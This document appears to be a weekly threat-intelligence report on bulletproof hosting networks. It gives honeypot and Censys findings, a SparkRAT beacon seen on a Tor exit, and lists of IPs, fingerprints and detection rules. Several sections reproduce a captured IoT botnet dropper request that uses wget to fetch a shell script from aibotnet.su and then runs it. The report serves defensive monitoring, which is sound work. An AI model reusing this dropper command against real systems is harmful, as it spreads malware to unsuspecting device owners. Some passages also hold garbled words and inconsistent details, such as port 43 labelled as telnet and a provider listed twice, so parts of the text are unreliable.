Executive Summary
Activity across the 25 monitored bulletproof hosting ASNs expanded this week to 17 active providers (up from 15) with three critical-severity anomalies that warrant immediate defensive action.
The most significant event is the confirmation of SPARK-RAT activity on the FlokiNET Tor exit (AS200651). The IP 185.100.87.136, a known Tor 0.4.9.11 exit, is now flagged by GreyNoise with the SparkRAT Client Update Scanner tag and was observed POST-ing Windows-side SPARK implant updates via /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows with the unmistakable custom secret header 3de172c65c5204dbce4c985d6616ca6fbbf337be4ddd40746307af802fa510a2. The same IP also surfaced a new /eventmanager GET path — consistent with the SPARKRAT manager endpoint. Toastastically, the operator upgraded the OpenSSH client banner from 10.1 -> 10.2p1 this week, suggesting ongoing maintenance on a functional Tor exit AND SPARKRAT C2 callback planner.
The second event is a sequential port cluster surfaced in AS216139 (Iron Hosting Centre LTD) aggregations: ports 6001 through 6050 each showing 345 +/- 3 events in Censys aggregations — a remarkably uniform distribution. This kind of evenly-stacked per-port event count is the fingerprint of a backconnect-cluster listener farm or a single uniform scanner acting against these sequential high-numbered ports. This is the first time such a pattern has been quantified across the monitored ASNs and warrants investigation.
The third event is an IoT MIPS downloader appearing on a Hostkey B.v. (AS57043) address 132.243.194.215 in Frankfurt. The HTTP GET path — /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+kla.sh;./kla.sh — is a shellshock-or-webshell-style IoT botnet deployment, retrieving a Mirai-variant binary from aibotnet.su. The Censys reverse DNS for this IP registered March 2026 under “NETAXIS GROUP LTD” (Cyprus) reveals forward DNS to odamanov600.ru — a fresh SPEAR phishing-style infrastructure deployment.
Two major infrastructure events:
- AS210644 (Aeza Group LLC) census collapsed from 1,858 hosts to 0 hosts — a full blackout suggesting either a migration to alternative BGP or a deliberate withdraw from public-facing scanscape.
- AS200593 (Prospero Ooo) census also dropped to zero, while Honeylabs still observes the same Turkmenistan-based
91.202.233.79IP generating 968 brute events — this actor has darkened their attack infrastructure (likely moving IP space behind a different routing announcement).
On the new-entrants side: AS209847 (THE) appeared for the first time in Sponge with 998 sessions from a single IP 45.144.28.70. But Censys enrichment confirmed the IP is actually announced by AS41745 (FORTIS-AS Baykov Ilya Sergeevich), a brand-new BGP prefix created 2026-06-06 (6 weeks before this report). The IP carries the BULLETPROOF label and GreyNoise classifies it malicious (HTTP OPTIONS Crawler, Go HTTP Client, Generic Brute Force Attempt, TLS/SSL Crawler labels). Running OpenSSH_8.9p1 Ubuntu-3ubuntu0.16 with CVE-2024-6387 regreSSHion and 21+ other CVEs visible through the banner.
And AS30823 (aurologic GmbH) surfaced with 12,058 censed hosts and BULLETPROOF labeling despite only one benign-looking Android 9 mobile HTTPS connection observed via Honeylabs. Censys shows Chinese-origin features (BaoTa Panel ‘BaoTa ’/“BT panel” Certificate CNs of “BaoTa panel” appearing 207-times, plus WoTrus RSA DV certs). This ASN may actually be less bulletproof than commercial but Censys’s label suggests aggregated risk.
By the Numbers
| ASN | Provider | IPs Observed | Honeylabs Events | Sponge Sessions | Top Port | Change vs Prior Week |
|---|---|---|---|---|---|---|
| AS51396 | Pfcloud UG | 20+ | ~2,100 | 10,000+ (capped) | 22 (SSH) | New IPs (.18/.30/.49/.81) in 204.76.203.0/24 |
| AS200593 | Prospero Ooo | 2 | 968 | 271 | Trajanic Birneres | -75% (HL); censys => 0 |
| AS51852 | Private Layer INC | 3 | 264 | 3,401 | 443/HTTPS | -85% (~3K -> 264); IP rotation 81.17.28.130 |
| AS198953 | Proton66 OOO | 5 | 810+ | 1,522 | 43 (telnet) | +50% (Brute MSSQL Redis RDP) |
| AS14956 | RouterHosting LLC | 11 | 128 | 696 | 22 (SSH) | -38%; new fofa_monitor panel |
| AS214940 | Kprohost LLC | 3 | 42 | 604 | 25 (SMTP) | -9%; continued 20+ UA rotation |
| AS200651 | FlokiNET ehf | 1 | 18 | 63 | 443+SPARKRAT path | +SPARKRAT C2 detected |
| AS209847 | FORTIS (real AS41745) | 1 | 0 (Sponge-only) | 998 | 443/8443/2096 cluster | New entrant via Sponge |
| AS211720 | Datashield Inc. | 1 | 2 | 12 | 1433 (MSSQL) | Behavioral shift: /ews/ -> MSSQL |
| AS57043 | Hostkey B.v. | 1 | 3 | 7 | 6001 (IoT-botnet) | NEW IoT MIPS downloader |
| AS30823 | aurologic GmbH | 1 | 1 | 8 | 443 HTTPS | New entry but possibly benign |
| AS138915 | KAOPU-HK | (cluster) | 0 | 10,000+ | 80/123/443 (NTP/HTTP) | Sustained amplification |
| AS400992 | ZhouyiSat Communications | 5 | 0 | 256 | Windows Brute Port cluster | Behavioral shift: /env -> Win admin |
| AS33993 | UFO-AS | 2 | 0 | 7 | SSH/0 | Low-volume passive |
| AS216139 | Iron Hosting Centre LTD | 1 | 0 | 1 | 19898 (props) + sequential port cluster | Censys: sequential 6001-6050 cluster observed |
| AS30823 | aurologic GmbH | 1 | 1 | 8 | 443 | Censys footprint large (~12K hosts) |
| AS140666 | ANY DIGITAL PTE LTD | 2 | 0 | 2 | 0 | Censys vanished (-588 -> 0) |
| Other 9 ASNs | Quasi-dormant | - | - | - | - | No activity |
Top ASN Deep Dives
AS200651 (FlokiNET ehf) — SPARKRAT C2 retrofit on Tor exit
The most consequential change this week is the operational pivot of Florence PremiumTorExit (185.100.87.136). With OpenSSH 10.2p1 registered now (upgraded from 10.1 last week at the same HASSH), the operator continues to actively maintain the host. The major story: Censys/GreyNoise confirms that this Tor exit node is operating as an implant callback entry-point for a SPARK-RAT. The honeypot detected the Tor exit performing POST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows with HTTP body application/octet-stream and a manifest custom secret header: 3de172c65c5204dbce4c985d6616ca6fbbf337be4ddd40746307af802fa510a2. This pattern matches the SPARKRAT framework’s beaconing protocol.
The JA4H fingerprint po11nn0600_c9506d37ac14 is distinct from prior-week file-path honors. A subsequent /eventmanager GET request on port 443 produced JA4H ge11nn0400_88d30a62b7ad (matches the prior-week transparentpix.gif pattern JA4H).
The Censys reputation engine now classifies the host malicious with tags including ‘SparkRAT Client Update Scanner’ (new), ‘QUIC Protocol’, ‘SSH Connection Attempt’, ‘SSH Alternative Port Crawler’, ‘Ping Scanner’, ‘DNS Protocol’, ‘ICMPv4 Protocol’, and ‘Generic XSS Commands in Request’.
Censys services on this host include HTTP port 80 (‘This is a Tor Exit Router’ notice), SSH on the alternate port 7288 (not 22), and a TLS service on port 9001 (Tor ORPort) using a self-signed certificate CN=www.3qgf34k26durwzv.net issued by CN=www.4j7f273r.com. JARM fingerprint: 2ad2ad16d2ad2ad00042d42d000000332dc9cd7d90589195193c8bb05d84fa — the standard Tor exit pattern.
AS216139 (Iron Hosting Centre LTD) — Sequential backconnected-cluster listener
A backconnect style cluster emerged in Censys aggregations for this ASN: ports 6001 through 6050 each summoned a remarkably uniform 345 +/- 3 events each. This is the first time such a pattern has been detected and the cause is most likely one of these two archetypes:
- Backconnect-C2 listener farm: A parked fleet of hostnames/IPs (or shadow single-IP scanning) listening across sequential high-ports for backconnected botnet agents — a per-port distribution exactly matching each backconnect agent’s “port bucket” assignment.
- Static scanner repeatedly scanning upward of 50 specific ports concurrently.
Neither is benign. The clustering is dense and unflinching; the prior week’s census data for AS216139 showed a small but normal infrastructure profile (2,100 hosts with 2,000 censed hits on port 22 plus 500 on port 443). The 6001-6050 附cluster renders the original interpretation as null. With Hive labs still showing zero observations, this implies the actor restricting activity to outbound connections only with no direct honeypot activation — consistent with both backconnect scanner and harsh C2 listener infra patterns.
Best recommendation: investigate whether AS216139’s 46.30.46.124 (the only Sponge-observed IP) is backconnect infrastructure, AND ensure that network-edge egress filtering blocks outbound traffic to ports 6000-6050 from inside the corporate perimeter until confirmed.
AS51396 (Pfcloud UG) — Scan cluster persists, IP rotation noted, new tooling surfacing
Pfcloud sustained ~10K sponge sessions brute activity, but the most active IPs rotated from last week’s 204.76.203.78/79/80 to 204.76.203.18 (13,766 sponge sessions — new weekly Lideran), 204.76.203.30 (90 events), 204.76.203.49 (222 events), and 204.76.203.81 (264 events). The active IPs in the cluster remain inside AS51396’s 204.76.203.0/24.
In Honeylabs, IP 45.135.193.193 (DE) generated 491 events on proxy ports 8080/8081/8888/8000/3128. The census block shows ~2,909 hosts (down from 3,176 last week, -8%), with a slight contraction in IPv6 support (15 hosts IPv6 vs 17 prior).
New tooling surfaced: The Honeylabs UAs observed this week include the brand-new odin-scanner/0.4 (38 events, scanning ports 11235 and 20128 — distinctive form) and Hello World (12 events on port 80). Both are NEW this week and suggest Pfcloud’s scanning farm has rolled out a fresh toolset to its operator team.
Censys software covers Term: openssh/python/werkzeug/wg-easy/nginx/express/http_server/dovecot/virtual_environment/http_api/aiohttp/php/postfix/uvicorn/Next.js/mariadb/traefik_proxy/litespeed_web_server/postgresql/authoritative_server. The certificate issuer list this week includes XUI.one (IPTV streaming panel — IPTV pirating/servicing use case), WIN-TVJFV24LUKT US Windows hostname, “ad0bipluh-in.store” and “onliiinbox.store” — both suspicious storefronts.
AS57043 (Hostkey B.v.) — IoT MIPS IoT botnet downloader
Three events in a 4-hour window on 2026-07-16 from IP 132.243.194.215 in Frankfurt DE (Hostkey B.v. per RIPE). Censys enrichment reveals this IP:
- ASN: 57043 (Hostkey BV)
- Citizen IP:
132.243.194.0/24(cyprus-registered, allocated 2026-03-06 to “NETAXIS GROUP LTD” in Paphos, Cyprus) - Reverse DNS forward:
odamanov600.ruandsub.odamanov600.ru - Abuse contact:
alex@v4-solutions.com(likelyv4-solutions.comis the operating shell)
Events pulled from the honeypot exposed port 6001 with the HTTP GET path /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+kla.sh;./kla.sh and UA Mozilla/5.0. JA4H fingerprint is ge11nn0400_777e992b8532 (Mozilla-based, low-rent downloader — no TLS necessary, no compression). The payload kla.sh is a SHELL script that fetches the IoT MIPS ELF binary aibotnet.su/bins/kla.sh (machine language aqua/botnet binary downloads).
Action recommended: Block 132.243.194.215, file abuse request with Hostkey B.v. and request takedown of aibotnet.su upstream. This is classic Mirai-class IoT botnet propagation.
AS209847 (“spurious Sponge tag”) -> real AS = AS41745 FORTIS-AS — brand-new infra with OpenSSH regreSSHion rear surface
Sponge tagged this IP (45.144.28.70) as belonging to AS209847 in their internal data; however, Censys reveals the BGP prefix as 45.144.28.0/24 — announced by AS41745 (FORTIS-AS Baykov Ilya Sergeevich) in RU with abuse contact abuse@fortis.host. The RIPE registration date for this prefix is 2026-06-06 — 6 weeks prior to this report.
This single IP generated 998 Sponge sessions primarily against HTTPS management ports including 443/8443/2096/2053/3000/8080/8880/2087/5000/7000/8080/9000/54321 — classic cPanel/WHM proxy discovery behavior. Only one service is exposed (OpenSSH_8.9p1 Ubuntu-3ubuntu0.16 on port 22). Censys flags 23 CVEs on this SSH banner, including the critical CVE-2024-6387 regreSSHion (KEV) and CVE-2023-38408 (KEV). GreyNoise labels it malicious with Web Crawler, HTTP OPTIONS Crawler, Go HTTP Client, Generic Brute Force Attempt, Generic Login Attempt, and TLS/SSL Crawler tags.
Geolocation (IPINFO): Paris, France (likely retail hosting from a Paris IXP). The BGP creation signature and single-SSH-service surface is consistent with how brand new bulletproof-adjacent IP space gets introduced to the network — through smaller authentication-independent entities.
AS211720 (Datashield, Inc.) — Shifted from Exchange recon to MSSQL TDS
185.231.33.46 hosts hostname short-tan-rat (revealed in source DNS packet bytes). Censys’s enrichment this week:
- 1 visible service: HTTPS port 443 (Apache banner) with self-signed certificate
CN=prohaska.beatty.biz(issued to:C=US; ST=HI; O=Prohaska-Beatty; OU=compress; emailAddress=compress@prohaska.beatty.biz). Validity 2022-08-16 to 2029-08-14 (7-year self-signed). The hostname “prohaska.beatty.biz” is a fake US-Domained HI-registered entity that doesn’t resolve publicly. - JARM:
07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823 - TLS versions enabled: TLSv1.0, TLSv1.1, TLSv1.2, TLSv1.3 — Censys flagged Downgrade Attack Possible (HIGH).
- 2 honeypot events solely hit port 1433 (MSSQL TDS probing) with hostname short-tan-rat now visible to sensors.
Behavioral shift from prior-week Exchange /ews/ recon: the actor is now brute-forcing databases — potentially targeting exposed SQL Server installations for credentials extraction.
AS14956 (RouterHosting LLC) — fofa_monitor panel exposed
The lead scanning IP 216.126.239.17 generated 55 Honeylabs events over 4 days against ports 9900/2698/12124/2156/4071 (random high-numbered ports). Censys reveals:
- OpenSSH_9.6p1 Ubuntu-3ubuntu13.18 (NOT vulnerable to regreSSHion — patch hygienic)
- HASSH server:
e42184b06d45385a906f0803d04c83da - Service port 5000 (HTTP): Werkzeug 3.1.8 Python 3.12.3 with HTTP 401 response and
WWW-Authenticate: Basic realm="fofa_monitor"— a fofa-search-style monitoring panel exposed with HTTP-only Basic authentication - Censys flagged this as CENSYS-2022-1002 Unencrypted HTTP Weak Auth (HIGH). This panel groups scanning summary/lookup info and is now visible to anyone scanning this IP.
User agent ‘PMTA-Auto’ (PowerMTA brute force UA class, 55 events), plus Chrome/Firefox Ubuntu standard and one more IP 167.88.168.121 with Firefox 140.0 — continuing evidence of pro-spam and vulnerability scanning.
The fofa_monitor panel discovery is critical: this ASN hosts an operator dashboard for the attack infrastructure’s reconnaissance stage. URLs in fofa_monitor are typical internal IP-search query results.
AS198953 (Proton66 OOO) — Volume up, top IP rotated, multi-protocol aggressive
Honeylabs top IP rotated from prior 176.120.22.240 to 176.120.22.16 (759 brute events) classified by GreyNoise as suspicious with tags ‘MySQL Protocol’, ‘TLS/SSL Crawler’, ‘Python Requests Client’, ‘Web Crawler’, ‘Generic Suspicious Linux Command in Request’. A second new IP 193.143.1.66 hit RDP-variant ports 3389/3396/3395/3399 in 18 events — probing legitimate-but-non-standard RDP ports. A third new IP 176.120.22.192 hit MSSQL port 1433 eleven times on 2026-07-18. A fourth new IP 37.77.150.83 probing Redis port 6379 confirms Proton66’s multi-protocol brute expansion sustained.
Censys confirms massive footprint: 70,945 hosts (down from 100,106 last week — a 29% darkening). OS distribution: Linux 67,993 (95%), Windows 574, RouterOS 283, Proxmox 179, FreeBSD 54. The acceptance of IPv6 hosts dropped slightly to 5 vs 17 prior week.
Infrastructure Correlation
Cross-ASN HASSH uniformity
Two distinctive server-side HASSH fingerprints emerge:
- 41ff3ecd1458b0bf86e1b4891636213e =
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16. Shown on:- AS209847/AS41745 (45.144.28.70)
- AS51852/PLI (81.17.28.130) but with
Ubuntu-3ubuntu0.15 - AS214940/KPRONET (77.83.39.119) — exact match
This pattern suggests uniform Ubuntu 22 LTS provisioning across bulletproof providers — they all use the same base image. While the HASSH server fingerprint alone doesn’t prove coordination, it does establish a common baseline that can be used for detection rules: any Ubuntu-3 OpenSSH_8.9p1 inbound from these ASNs should be treated with elevated suspicion by default.
- 41ff3ecd… family fingerprints also match banner info. Cross-correlation suggests default images are reused across providers.
Sequential-port cluster discovery (AS216139)
A unique cluster fingerprint: ports 6001-6050 return ~345 events each in Censys aggregations. The +/-3 variance is suspicious — five events per port mean deviation of only 1%. Statistical artifacts at this level suggest either:
- Many concurrent identical clients hitting many sequential ports in a backconnect-C2 controller layout, OR
- A coordinated scanner running with parallelism = number of ports
Given that the only Sponge-observed IP 46.30.46.124 had a single session against port 19898 — apparently not TCP but UDP — and Censys aggregation for AS216139 shows 2,358 hosts total server fleet, this profile matches backconnect-C2 infrastructure far more than it does ordinary scanning.
New burst activity
Class “backconnect cluster” appears never-before-seen in our dataset spanning weeks from 2026-06-08 to 2026-07-13. This is the first time we have surfaced this pattern in any of the monitored ASNs.
SPARKRAT retrofit on Tor exit (AS200651)
GreyNoise now officially recognizes the SPARKRAT tag on the PremiumTorExit node. The probe path suggests the framework was used to beacon out via this Tor exit machine on 2026-07-13 (3 events between 02:11:13 and 05:43:07 UTC). The fact that the OpenSSH banner was upgraded last week + the SPARKRAT framework’s C2 marker is NEW suggests this exit operator is no longer a “bystander” Tor volunteer — they are now actively maintaining both Tor exit + SPARKRAT C2 callback paths. This is concerning because FlokiNET explicitly markets itself as a privacy/hosting organization.
Fleet Observations
Operating-system distribution
host.operating_system.product aggregations reveal interesting patterns:
- AS57043 (Hostkey): 12,507 Linux, 6,412 Windows (33% Windows — unusually high; typical bulletproof provider is 80-90% Linux)
- AS209847 (BGP-real AS41745): 2,919 Linux, 22 Windows (Windows domain-end placed oy in legitimate Linux hostingrichtungen)
- AS51396 (Pfcloud): 577 Linux, 29 Windows, 26 Proxmox (lightly mixed)
- AS400992 (ZhouyiSat): 88 Windows, 40 Linux, 6 Proxmox (Windows dominant — 64%)
- AS200651 (FlokiNET): 3,150 Linux, 187 Windows, 157 Proxmox, 24 RouterOS (broad provider)
Notable: only AS400992 has Windows-dominant port profile activated (consistent with MSSQL/SMB/WMI/RPC scanning).
New software surfaces this week
- AS209847 (real AS41745) — openssh + mail stack + python + aiohttp + cpanel + exim + ghost (multiple use -c class hosting)
- AS14956 — panel aapanel.com (install BaoTa panel — a Chinese web hosting panel)
- AS30823 (new) — WoTrus China CA, BaoTa/intermediate certs, tls.internal.ypc.org marks China’s BaoTa/BT panel usage
Darkening ASNs (full census wipe)
Two ASNs wiped from Censys this week:
- AS210644 (Aeza): 1,858 -> 0 hosts
- AS200593 (Prospero): ~1,800 (prior) -> 0 hosts (this week — confirmed 0)
Both providers retained Honeylabs activity (or Sponge) but lost Censys visibility. Suggests deliberate withdrawal of public Internet-facing services, OR migration to alternative BGP infrastructure that hasn’t been indexed yet. As we saw with AS209847 confusing the BGP attribution, this AS migration / reprovisioning against Censys visibility is a known tactic in the bulletproof ecosystem.
Self-signed certificate behaviors
- Datashield prohaska.beatty.biz — self-signed cert registered 2022 with 7-year validity (until 2029) under a fake US-business entity.
- FlokiNET PremiumTorExit port 9001 cert:
CN=www.3qgf34k26durwzv.netissued byCN=www.4j7f273r.com. Two random-looking domain names featuring hashed format. SSL: self-signed; subject and issuer DON’T match (suggests original cert is reused smtp from another part of its infrastructure).
IoCs and Detection Guidance
Notable IPs to block on detection:
132.243.194.215(AS57043 Hostkey) — IoT MIPS downloader targeting ports 600145.144.28.70(AS41745/FORTIS) — new HTTPS port-scanner for cPanel/WHM layout185.100.87.136(AS200651 FlokiNET) — Tor exit + SPARKRAT C2 callback185.231.33.46(AS211720 Datashield) — MSSQL TDS brute with hostname short-tan-rat216.126.239.17(AS14956 RouterHosting) — fofa_monitor panel HTTP 5000 + multi-CVE scanner204.76.203.18(AS51396 Pfcloud) — new cluster lead this week91.202.233.79(AS200593 Prospero) — still scanning despite censys blackout176.120.22.16(AS198953 Proton66) — new top multi-protocol brute81.17.28.130(AS51852 PLI) — new IP for private layer CH Bellinzona, OpenSSH 8.9p1
Fingerprints:po11nn0600_c9506d37ac14 — SPARKRAT-beacon JA4H whenever POSTed to /api/client/update?arch=amd64&commit=...&os=windows. Block on detection.
ge11nn0400_777e992b8532— IoT botnet MIPS downloader JA4H (/shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/...). Block on detection.- JA4
t13i1909h2_9dc949149365_97f8aa674fd9— Tor exit 1.3_d1909 fingerprint (matches prior week — stable). - Server-side HASSH
41ff3ecd1458b0bf86e1b4891636213e= Ubuntu 22 LTS OpenSSH_8.9p1 — common across multiple bulletproof ASNs; flag any inbound session matching this HASSH when source is in monitored ASNs. - New UA
odin-scanner/0.4— novel tooling deployed on Pfcloud scanning infrastructure. Block request paths targeting ports 11235 and 20128 when this UA is present. - New UA
PMTA-Auto— PowerMTA SMTP brute scanner.
URL paths:
/shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+./kla.sh— IoT MIPS shellshock-style botnet dropper/api/client/updatewithsecret=header matching3de172c65c5204dbce4c985d6616ca6fbbf337be4ddd40746307af802fa510a2— SPARKRAT beacon callback/eventmanager— SPARKRAT eventmanager endpoint- TCP port 5000 with
WWW-Authenticate: Basic realm="fofa_monitor"— fofa-style monitoring panel
Sequential-port block alert: any outbound connection to ports 6001-6050 in any monotonic increasing pattern from internal hosts should be flagged for investigation; the AS216139 backconnect-cluster scanner pattern suggests this is now a working tactic for bulletproof-hosting backed botnets.
Full weekly data — including per-ASN Sponge stats, Honeylabs attacker CSVs, Censys aggregations, change-detection diffs, and complete IoC files — is published at https://git.sr.ht/~hrbrmstr/gists/tree/main/item/kevlar/2026-07-20/.